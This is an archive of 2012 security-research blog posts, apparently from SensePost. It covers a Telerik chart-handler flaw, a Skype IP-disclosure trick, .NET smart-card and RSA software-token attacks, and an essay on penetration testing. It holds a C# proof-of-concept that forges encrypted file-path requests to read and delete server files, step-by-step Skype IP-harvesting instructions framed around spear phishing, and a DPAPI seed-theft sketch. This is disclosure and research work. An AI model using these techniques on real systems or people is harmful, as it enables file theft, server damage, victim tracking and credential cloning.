
Fri, 14 Dec 2012

Dangers of Custom ASP.NET HttpHandlers

ASP.NET HttpHandlers are interesting components to examine when performing security assessments of .NET web applications, mainly because they are the most exposed part of the application, processing client requests at the HttpContext level, while often not being part of the official ASP.NET framework.
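For readers unfamiliar with them, a custom handler is simply a class implementing System.Web.IHttpHandler that is mapped to a path in web.config. A minimal (and deliberately naive) sketch, with illustrative names:

using System.Web;

// Minimal custom handler: it receives the raw HttpContext for any request
// mapped to it, before the usual page-level validation machinery runs.
public class IconHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        // Query-string input arrives unvalidated; sanitising it is entirely
        // the handler author's responsibility. An unchecked "name" like this
        // is exactly the class of bug discussed below.
        string name = context.Request.QueryString["name"];
        context.Response.ContentType = "image/png";
        context.Response.WriteFile(context.Server.MapPath("~/icons/" + name));
    }

    // The runtime may reuse a single instance across requests.
    public bool IsReusable
    {
        get { return true; }
    }
}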


As a result, data validation vulnerabilities in custom HttpHandlers can be exploited far more easily than issues in the inner-layer components. However, they are mostly overlooked during web application tests for two reasons:


  1. They are used by third-party components of the target application, and the auditor often wants to focus on the application's main functions.

  2. They often perform mundane operations such as displaying an icon file or a chart from an image cache, which is deemed uninteresting during an assessment.


In this post, I'm going to demonstrate a data validation vulnerability in a custom HttpHandler that is used by a number of well-known ASP.NET applications, such as the DotNetNuke CMS, and was not fixed by the vendor until 2012/3. We still come across web applications that use this vulnerable component, so we thought it useful to document this vulnerability in the Telerik ASP.NET UI control, which could allow a remote user to download and remove files from the web server under the application pool's permissions.


If you are using any of the Telerik components in your application, make sure to replace "Telerik.Web.UI.dll" with the latest version (about 9MB!).


Vulnerability details:


The Telerik UI control has a web-based charts feature, which stores rendered graphic files in a cache folder for performance reasons. It registers a custom HttpHandler in the web.config file, which processes the following GET request and displays the chart in the client browser:


http://site/ChartImage.axd?useSession=false&imageFormat=image/png&ImageName=[base64 encoded value]
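For such a request to reach the handler, web.config maps the .axd path to the handler type. The registration looks roughly like this (the exact attributes may differ between versions; treat this as illustrative):

<system.web>
  <httpHandlers>
    <!-- Routes ChartImage.axd requests to Telerik's chart handler -->
    <add verb="*" path="ChartImage.axd"
         type="Telerik.Web.UI.ChartHttpHandler" validate="false" />
  </httpHandlers>
</system.web>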


The next step is to decompile ChartHttpHandler.ProcessRequest(HttpContext) and examine its logic.
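The original post showed the decompiler output as a screenshot, which isn't reproduced here; based on the behaviour described in the rest of this post, the core of the handler looks roughly like this (member names and structure are illustrative, not verbatim decompiled source):

using System.IO;
using System.Web;

public class ChartHttpHandlerSketch : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        // ImageName is base64-encoded AES ciphertext; the handler decrypts
        // it with a key/IV embedded in Telerik.Web.UI.dll.
        string encryptedName = context.Request.QueryString["ImageName"];
        string fileName = DecryptImageName(encryptedName); // hypothetical helper

        // The decrypted value is used as a file path with no validation
        // that it actually points into the chart image cache.
        context.Response.ContentType =
            context.Request.QueryString["imageFormat"];
        context.Response.WriteFile(fileName);

        // Served files are treated as expired cache entries and deleted.
        File.Delete(fileName);
    }

    private string DecryptImageName(string value)
    {
        // Placeholder for the AES decryption described below.
        throw new System.NotImplementedException();
    }

    public bool IsReusable { get { return true; } }
}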



Although the ImageName query string parameter is encrypted using an AES algorithm to prevent tampering, the encryption key and initialization vector are embedded in the application's assembly (Telerik.Web.UI.dll) and can be used to construct malicious requests that download files from the remote server.
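The original post illustrated such a request with a screenshot. As a stand-in, here is a sketch of how a malicious ImageName value could be constructed once the key and IV have been lifted from the assembly (the key/IV bytes below are placeholders, NOT the real embedded values):

using System;
using System.Security.Cryptography;
using System.Text;

class ChartImagePoc
{
    // AES-CBC encrypt a target path the way the handler expects, then
    // base64-encode it for the ImageName query parameter.
    static string EncryptImageName(string path, byte[] key, byte[] iv)
    {
        using (var aes = Aes.Create())
        {
            aes.Key = key; // lifted from Telerik.Web.UI.dll (placeholder here)
            aes.IV = iv;   // likewise a placeholder
            using (ICryptoTransform enc = aes.CreateEncryptor())
            {
                byte[] plain = Encoding.UTF8.GetBytes(path);
                byte[] cipher = enc.TransformFinalBlock(plain, 0, plain.Length);
                return Convert.ToBase64String(cipher);
            }
        }
    }

    static void Main()
    {
        byte[] key = new byte[32]; // placeholder key
        byte[] iv  = new byte[16]; // placeholder IV
        string imageName = EncryptImageName(@"C:\inetpub\wwwroot\web.config", key, iv);

        Console.WriteLine("http://site/ChartImage.axd?useSession=false"
            + "&imageFormat=image/png&ImageName="
            + Uri.EscapeDataString(imageName));
    }
}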



All versions up to and including 2011.2.915.35 are vulnerable. I've created a proof of concept that can be downloaded here. Please note that the target file will be deleted from the web server by the chart image handler after being downloaded, because the handler treats the requested file as an expired cache entry.


Next time you are on an assessment, don't overlook the mundane and not-so-interesting parts of the application, as they can often provide you with additional attack surface.

Mon, 26 Nov 2012

Skype Passive IP Disclosure Vulnerability

When performing spear phishing attacks, the more information you have at your disposal, the better. One tactic we thought useful was exploiting this Skype security flaw, disclosed in the early days of 2012 (and discovered by one of the Skype engineers much earlier).

For those who haven't heard of it - this vulnerability allows an attacker to passively disclose a victim's external, as well as internal, IP addresses in a matter of seconds, by viewing the victim's VCard through an 'Add Contact' form.

Why is this useful?

1. Verifying the identity and the location of the target contact. Great when performing geo-targeted phishing attacks.

2. Checking whether your Skype account is being used elsewhere :)

3. Spear phishing enumeration while Pen Testing.

4. Just out of plain curiosity.

To get this working, follow these basic steps:

1. Download and install the patched version of Skype 5.5 from here (the patch enables the Skype client to save its logs in non-obfuscated form).

2. Save the lines below as a Skype_log_patch.reg file:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Skype\Phone\UI\General]
"LastLanguage"="en"
"Logging"="SkypeDebug2003"
"Logging2"="on"
3. Once saved, run it to enable the Skype debug log file.

4. Start Skype.

5. Search for any Skype contact and click the 'Add a Skype Contact' button, but do not send the request; instead, click on the user to view their VCard.

6. Open the log file (it should appear in the same folder as the Skype executable, e.g. debug-20121003-0150).

7. Look for the PresenceManager line - you should see something similar to this:

In that log entry you can spot my Skype name, as well as my external and internal IP addresses.

The log will include similar details for everyone listed as a contact under your Skype account, as well as plenty of other fresh, genuine, and useful information received directly from your local Skype tracker.

Mon, 10 Sep 2012

44Con: Vulnerability Analysis of the .NET Smart Card Operating System

Today's smart cards, such as banking cards and smart corporate badges, are capable of running multiple tiny applications which are often written in high-level programming languages like Java or Microsoft .NET and compiled into small card-resident binaries. It is a critical security requirement to isolate the execution context and data storage of these applications in order to protect them from unauthorized access by other malicious card applications. To satisfy this requirement, multi-application smart cards implement an "Application Firewall" concept in their operating system, which creates an execution sandbox for card applications.

During the recent 44con conference in London, we presented the "HiveMod" reverse engineering tool for .NET smart cards and demonstrated the exploitation of a vulnerability to bypass the card's application firewall. The talk also highlighted threats and possible attack scenarios against smart corporate or military badges.

The presentation slides can be viewed below:

The following video shows exploitation of the "public key token spoofing" vulnerability on the .NET smart card using the "HiveMod" tool:

Please contact SensePost research team for more information.

Thu, 24 May 2012

RSA SecurID Software Token Update

There has been a healthy reaction to our initial post on our research into the RSA SecurID Software Token. A number of readers had questions about certain aspects of the research, and I thought I'd clear up a number of concerns that people have.

The research pointed out two findings; the first is a design vulnerability in the "Token Binding" mechanism of RSA's software. The second is another design issue that affects not only the RSA software token but also any other software that generates pseudo-random numbers from a "secret seed" while running on traditional computing devices such as laptops, tablets or mobile phones. Hardware tokens, which are often tamper-resistant, address this problem correctly.

Let me first explain one of the usual use cases of RSA software token deployments:

  1. The user applies for a token via the RSA self-service console or a custom web form.
  2. The user receives an email containing the software token download URL. Once the software is installed, they open the program, choose Token Storage Devices, read the "Device Serial Number", and reply with that serial number to complete their token request.
  3. A second email contains the user's personal RSA SecurID Token Configuration file as an attachment, which they import into the RSA software token. This configuration file is bound to the user's laptop or PC.
  4. A third email contains an initial password to activate the token.

An attacker who is able to capture the victim's configuration file and initial password (the security of this initial password is the subject of future research at SensePost and will be released later) would be able to import the file into their own token, using the method described, to bypass the token binding. This attack can be launched remotely and does not require a "fully compromised machine", contrary to RSA's statement.

The second finding, as I mentioned before, is a known issue with all software tokens. Our aim at SensePost was to demonstrate how easy or hard it would be for an attacker who has already compromised a system to extract the RSA token secrets and clone them on another machine. A number of people commented on the fact that we did not disclose the steps required to update the LSA secrets on the cloned system. Whilst this technique is relatively easy to perform, it is not required for the attack to function.

If a piece of malware were written for this attack, it would NOT have to grab the DPAPI blobs and replicate them on the attacker's machine. It could simply hook CryptUnprotectData and steal the decrypted blobs once the RSA software token starts execution. The sole reason I included the steps to replicate the DPAPI blobs on another machine was that this research was performed during a real-world, time-limited assessment. We chose to demonstrate the attack to the client by replicating the DPAPI blobs instead of developing proof-of-concept malcode.
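To make the hooking point concrete: DPAPI's CryptUnprotectData, exposed to managed code as ProtectedData.Unprotect, is where the protected seed becomes plaintext. A minimal sketch, with a hypothetical blob path:

using System;
using System.IO;
using System.Security.Cryptography; // ProtectedData: reference System.Security.dll

class DpapiSketch
{
    static void Main()
    {
        // Hypothetical path to a captured DPAPI blob (illustrative only).
        byte[] blob = File.ReadAllBytes(@"C:\temp\rsa_seed.blob");

        // ProtectedData.Unprotect is the managed wrapper around
        // CryptUnprotectData: this call is where the protected data
        // becomes plaintext, and it is the natural place for malware
        // to hook and read the decrypted buffer.
        byte[] plaintext = ProtectedData.Unprotect(
            blob, null, DataProtectionScope.CurrentUser);

        // CurrentUser scope means this succeeds only in the same user
        // context that protected the blob -- which in-process malware,
        // by definition, already has.
        Console.WriteLine(Convert.ToBase64String(plaintext));
    }
}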

A real-world piece of malware targeting RSA software tokens would choose the API hooking method, or a similar approach, to grab the decrypted seed and post it back to the attacker.

"I'm also curious to know whether software token running on smartphones might be vulnerable."

The "Token Binding" bypass attack would be successful on these devices, but with a different device serial ID calculation formula. However, the application sandboxing model deployed on most modern smartphone operating systems, would make it more difficult for a malicious application, deployed on the device, to extract the software token's secret seeds. Obviously, if an attacker has physical access to a device for a short time, they would be able to extract those secrets. This is in contrast to tamper-proof hardware tokens or smart cards, which by design provide a very good level of protection, even if they are in the hands of an attacker for a long time.

"Are the shortcomings you document particular to RSA or applicable to probably applicable to Windows software tokens from rival vendors too?"

All software tokens that execute a pseudo-random number generation algorithm based on a "secret value" are vulnerable to this type of cloning attack - not because of algorithm vulnerabilities, but simply because the software runs on an operating system and storage that are not designed to be tamper-resistant, unlike modern smart cards, TPM chips and secure memory cards.
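RSA's actual SecurID algorithm is proprietary, but everything in this class shares the same shape. The HOTP-style sketch below (RFC 4226 flavour, explicitly not RSA's algorithm) shows why: anyone who obtains the seed bytes can generate identical codes on any machine.

using System;
using System.Security.Cryptography;

class SoftTokenSketch
{
    // Illustrative HMAC-based OTP generator in the style of RFC 4226,
    // NOT RSA's proprietary SecurID algorithm. The point: possession
    // of 'seed' is possession of the token.
    static int GenerateCode(byte[] seed, long counter)
    {
        // 8-byte big-endian counter, per RFC 4226.
        byte[] msg = BitConverter.GetBytes(counter);
        if (BitConverter.IsLittleEndian) Array.Reverse(msg);

        using (var hmac = new HMACSHA1(seed))
        {
            byte[] hash = hmac.ComputeHash(msg);

            // Dynamic truncation: take 4 bytes at an offset derived
            // from the last nibble of the hash.
            int offset = hash[hash.Length - 1] & 0x0F;
            int binary = ((hash[offset] & 0x7F) << 24)
                       | (hash[offset + 1] << 16)
                       | (hash[offset + 2] << 8)
                       | hash[offset + 3];
            return binary % 1000000; // six-digit code
        }
    }

    static void Main()
    {
        // The RFC 4226 test seed ("12345678901234567890"); a cloned copy
        // of these bytes yields the same codes anywhere.
        byte[] seed = Convert.FromBase64String("MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=");
        Console.WriteLine(GenerateCode(seed, 1).ToString("D6")); // prints 287082
    }
}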

One solution for this might be implementing a "trusted execution" environment in CPUs, which has been done before for desktops and laptops by Intel (Intel TXT) and AMD. ARM's TrustZone technology is a similar implementation that targets mobile devices and secures mobile software from logical attacks and a range of physical attacks.

Wed, 9 May 2012

Pentesting in the spotlight - a view

As 44Con 2012 starts to gain momentum (we'll be there again this time around) I was perusing some of the talks from last year's event...

It was a great event with some great presentations, including (if I may say) our own Ian deVilliers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with penetration testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know, a core part of SensePost's business, and of my career for almost 13 years, has been security testing, so I followed this talk quite closely. The talk raises some interesting ideas, and I'd like to comment on some of the points Haroon makes.

As I understood it, the talk's hypothesis could be (over)simplified as follows:

  1. Despite all efforts the security problem is growing and we're heading towards a 'security apocalypse';
  2. Penetration Testing has been presented as a solution to this problem;
  3. Penetration Testing doesn't seem to be working - we're still just one 0-day away from being owned - even for our most valuable assets;
  4. One of the reasons for this is that we don't cater for the 0-day, which is a game-changer. 0-day is sometimes overemphasized, but mostly it's underemphasized, making the value of the test spurious at best;
  5. There are some ways in which this can be improved, including the use of '0-day cards', which allow the tester to emulate the use of a 0-day against a specific system without needing to actually have one. Think of this like a joker in a game of cards.

To begin with, let's consider the term "Penetration Testing", which sits at the core of the hypothesis. This term is widely used to express a number of security testing methodologies and could also be referred to as "attack & penetration", "ethical hacking", "vulnerability testing" or "vulnerability assessment". At SensePost we use the latter term, and the methodology it expresses includes a number of phases, of which 'penetration testing' - the attempt to actually leverage the vulnerabilities discovered and practically demonstrate their potential impact to the business - is only one. The talk did not specify which definition of Penetration Testing it was using; however, given the emphasis later in the talk on the significance of the 0-day and on 'owning' things, I'm assuming Haroon meant the most narrow, technical form of the term. It would seem to me that this already impacts much of his assertion: there are of course cases where a customer simply wants us to 'own' something, or some things, but most often penetration testing is performed within the context of a broader assessment, within which many of Haroon's concerns may already be being addressed.

As the talk pointed out, there are instances where the question is asked "can we be breached?", or "can we be breached without detecting it?". In such cases a raw "attack and penetration" test can be exactly what's needed; indeed, it's a model the military has used for decades. For the most part, however, penetration testing should only be used as a specific phase in an assessment, to achieve a specific purpose. I believe many services companies, including our own, have already evolved to the point where this is the case.

Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.

It is fair to say that the entire process within which security testing functions is not having the desired effect; hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.

A significant and interesting component of the talk's thesis has to do with the role of the 0-day in security and testing. Haroon rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test, and therefore the defender's real situation. He suggests that testing teams who do have 0-days are inclined to overemphasize the ones they have, whilst those who don't tend to underemphasize or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards: you can play a great game with a great hand, but if your opponent has a joker he's going to smoke you every time. In this the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby illustrate more realistically the impact a 0-day can have. I like this idea very much, and I'd like to investigate incorporating it into the penetration testing phase of some of our own assessments.

What I struggle to understand, however, is why the talk emphasizes this particular 'joker' over a number of others that seem apparent to me. For example, why not have a "malicious system administrator" card, a "spear phishing" card, a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like The Register and the Daily Telegraph illustrates, there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but it also cannot be ignored. This doesn't invalidate penetration testing itself; it simply illustrates that testing is not equal to risk management, and that risk management also needs to consider factors beyond the client's direct control.

The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.

The core of the approach I'm proposing is roughly based on the Microsoft methodology and looks as follows:

  1. Develop a model of your target environment, incorporating all players, locations, and interfaces. This is done in close collaboration between the client and the tester, thus incorporating both the 'insider' and the 'outsider' perspective;
  2. Enumerate all potential risks, and map them to the model. This results in a very long and comprehensive list of hypothetical risks, which would naturally include the 0-day, but also all the other 'jokers' that we discussed above;
  3. Sort the list into some order of priority and group similar hypothetical risks together;
  4. Perform tests in order of priority where appropriate to prove or disprove the hypothetical risks;
  5. Remediate, mitigate, insure or inform as appropriate;
  6. Rinse and repeat.

This approach provides a reasonable balance between solid theoretical risk management and aggressive technical testing, addressing the concerns raised in the talk about the way penetration testing is done today. It also provides the customer with a concrete register of tested risks that can easily be updated from time to time and makes sense to both technical and business leaders.

Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.

Solving the security problem in total is sadly still going to take a whole lot more work...